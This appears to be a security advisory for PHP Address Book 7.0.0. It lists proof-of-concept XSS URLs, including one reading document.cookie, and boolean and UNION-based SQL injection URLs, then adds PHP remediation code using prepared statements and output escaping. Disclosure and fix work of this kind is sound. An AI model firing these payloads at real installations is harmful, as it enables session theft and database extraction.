Title: PHP Address Book 7.0.0 Multiple security vulnerabilities
Author: Stefan Schurtz
Affected software: Successfully tested on PHP Address Book 7.0.0
Vendor site: http://sourceforge.net/projects/php-addressbook/

Vulnerability description
PHP Address Book 7.0.0 contains multiple XSS and SQL injection vulnerabilities.

Test method

// XSS
http://[target]/addressbookv7.0.0/preferences.php?from='"</script><script>alert('xss')</script>
http://www.2cto.com /addressbookv7.0.0/group.php/" /><script> alert('xss')</script>
http://[target]/addressbookv7.0.0/index.php?group='"</script><script>alert(document.cookie)</script>

// SQLi
http://[target]/addressbookv7.0.0/edit.php?id=1 AND 1=IF(1<2,2,1)
http://[target]/addressbookv7.0.0/edit.php?id=1 AND 1=IF(1>2,2,1)

// UNION-based Injection, needs 'magic_quotes=off'
http://[target]/addressbookv7.0.0/view.php?id=1' UNION ALL SELECT NULL, NULL, version(), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--+

Fix: strengthen input filtering.
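The advisory's fix is one line ("strengthen input filtering"); the sketch below, added here and not taken from PHP Address Book's own code, shows what that means for the two parameter types the PoCs target: the numeric id in edit.php/view.php (validate the type and bind it, so neither the boolean IF() nor the UNION payload reaches MySQL, regardless of magic_quotes) and the free-text from/group values and the script path in group.php (escape for the HTML context at output time). The table name, the PDO connection and the function names are assumptions.

```php
<?php
// Added example, not PHP Address Book's own code. Table name "addressbook"
// and the PDO handle $db are assumptions.

// SQLi: edit.php?id=1 AND 1=IF(1<2,2,1) and view.php?id=1' UNION ... only
// work when $_GET['id'] is concatenated into the SQL string. Reject anything
// that is not a positive integer, then bind the value instead of interpolating.
function loadEntry(PDO $db, array $get): ?array
{
    $id = filter_var($get['id'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {          // "1 AND 1=IF(...)" and "1' UNION ..." fail here
        http_response_code(400);
        return null;
    }
    $stmt = $db->prepare('SELECT * FROM addressbook WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetch(PDO::FETCH_ASSOC) ?: null;
}

// XSS: preferences.php?from='"</script><script>... and index.php?group=...
// break out of an attribute or <script> block when echoed raw. Escape at the
// point of output for the context the value lands in.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$from  = $_GET['from']  ?? '';
$group = $_GET['group'] ?? '';
?>
<!-- attribute context -->
<input type="hidden" name="from" value="<?= e($from) ?>">
<!-- text context -->
<h2>Group: <?= e($group) ?></h2>
<!-- group.php/" /><script>... rides in on the request path; a form action
     built from PHP_SELF or PATH_INFO must be escaped the same way -->
<form action="<?= e($_SERVER['PHP_SELF']) ?>" method="post">
<?php
// A value that must reach JavaScript goes through json_encode with the
// HTML-safe flags, never into a quoted <script> string literal.
echo '<script>var group = ' . json_encode($group,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT) . ';</script>';
```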